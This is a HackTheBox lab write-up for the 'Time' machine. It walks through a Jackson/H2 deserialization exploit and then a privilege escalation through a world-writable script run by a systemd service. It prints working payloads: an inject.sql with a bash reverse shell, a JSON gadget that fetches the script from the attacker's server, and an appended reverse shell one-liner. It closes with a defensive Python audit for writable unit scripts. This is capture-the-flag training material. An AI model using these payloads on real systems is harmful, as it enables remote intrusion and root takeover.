Time - [HTB]



Time is an easy-medium Linux HackTheBox machine where the attacker will have to exploit a JSON Data Processor in order to obtain a reverse shell as pericles. Then, he or she will have to modify a writable custom script that is run by a custom service in order to obtain the root flag.


As always, I started by scanning all ports on the machine.

kali@kali:$ sudo nmap -sS -p- --open -T5 -n -oN AllPorts.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-02 02:41 EST
Nmap scan report for
Host is up (0.043s latency).
Not shown: 65533 closed ports
22/tcp open  ssh
80/tcp open  http

There are just two open ports, so let's run nmap with default scripts to gather more information.

kali@kali:$ sudo nmap -sC -sV -p22,80 -n -oN AllPorts.txt
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As expected, nmap doesn't provide useful information, so the next step is to look at the web server, which shows this web site.



Submitting random data to the "Validate (beta)" beautifier produces the following error.

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'assdf': was expecting ('true', 'false' or 'null')

Searching Google turns up a post about Jackson gadgets. The post includes a SQL file named inject.sql, which can be modified so that, when executed, it gives us a reverse shell. The file is the following (change the IP):

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
       String[] command = {"bash", "-c", cmd};
       java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
       return s.hasNext() ? s.next() : "";  }
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/<IP>/4444 0>&1 &')

In order to execute the exploit, we need to start an HTTP server using python in the same directory where the payload (inject.sql) is stored, so the target can fetch the payload.

kali@kali:$ python -m SimpleHTTPServer

Then, we need to open a listening port using netcat.

kali@kali:$ nc -nlvp 4444

Finally, we only have to submit the following payload and a shell will appear as the user "pericles". (Change the IP)

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://<IP>:8000/inject.sql'"}]

Privilege escalation

Running LinPEAS reveals an unusual timer named "timer_backup.timer", which appears to belong to a service named "timer_backup".


Looking inside "timer_backup.service", it restarts the service "web_backup.service". The web_backup.service file, in turn, shows that the service executes a custom script named timer_backup.sh.

pericles@time:/home/pericles$ cat /etc/systemd/system/timer_backup.service 
Description=Calls website backup

ExecStart=/usr/bin/systemctl restart web_backup.service

pericles@time:/home/pericles$ cat /etc/systemd/system/web_backup.service
Description=Creates backups of the website

ExecStart=/bin/bash /usr/bin/timer_backup.sh

As the permissions show, the user "pericles" can modify this script.

pericles@time:/var/www/html$ ls -la /usr/bin/timer_backup.sh                                                       
-rwxrw-rw- 1 pericles pericles 88 Nov  5 18:35 /usr/bin/timer_backup.sh     

Hence, the file can be modified so it creates a reverse shell as it has been done before.

Firstly, create a listening port at 4445 using netcat.

kali@kali:$ nc -nlvp 4445

Secondly, we need to execute the following command so we can append the reverse shell using bash. (Don't forget to change the IP)

pericles@time:$ echo "bash -i >& /dev/tcp/<IP>/4445 0>&1" >> /usr/bin/timer_backup.sh 

Finally, you only have to wait for the script to execute, which gives a reverse shell as root.
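
The root cause of this escalation is a root-run systemd unit whose ExecStart script can be rewritten by an unprivileged user. As an added example (not part of the original write-up), the following Python audit extracts the paths from a unit's Exec* lines and reports any that are group/world-writable or not owned by root; the function names and the temporary stand-in file are assumptions made for the illustration.

```python
import os
import shlex
import stat
import tempfile

def exec_paths(unit_text):
    """Absolute paths named in the Exec* directives of a systemd unit."""
    paths = []
    for line in unit_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key.strip().startswith("Exec"):
            # Drop systemd's executable prefixes (-, @, :, +, !) first.
            tokens = shlex.split(value.strip().lstrip("-@:+!"))
            paths += [t for t in tokens if t.startswith("/")]
    return paths

def weakness(path, trusted_uid=0):
    """Why a non-root user could rewrite this file, or None if they cannot."""
    try:
        st = os.stat(path)
    except OSError:
        return None  # missing or unreadable: nothing to report here
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group/world-writable (mode %04o)" % mode
    if st.st_uid != trusted_uid:
        return "owned by uid %d" % st.st_uid
    return None

def audit(unit_text, trusted_uid=0):
    """Map each risky Exec* path in the unit to the reason it is risky."""
    found = {}
    for path in exec_paths(unit_text):
        reason = weakness(path, trusted_uid)
        if reason:
            found[path] = reason
    return found

if __name__ == "__main__":
    # Constructed sample: a stand-in for /usr/bin/timer_backup.sh with the
    # same -rwxrw-rw- mode, referenced the way web_backup.service does.
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "timer_backup.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(script, 0o766)
        unit = "[Service]\nExecStart=/bin/bash %s\n" % script
        for path, reason in audit(unit).items():
            print(path, "->", reason)
```

On a real host, feed it the contents of each file under /etc/systemd/system; the fix for a finding is to make the script owned by root with mode 0755 or stricter.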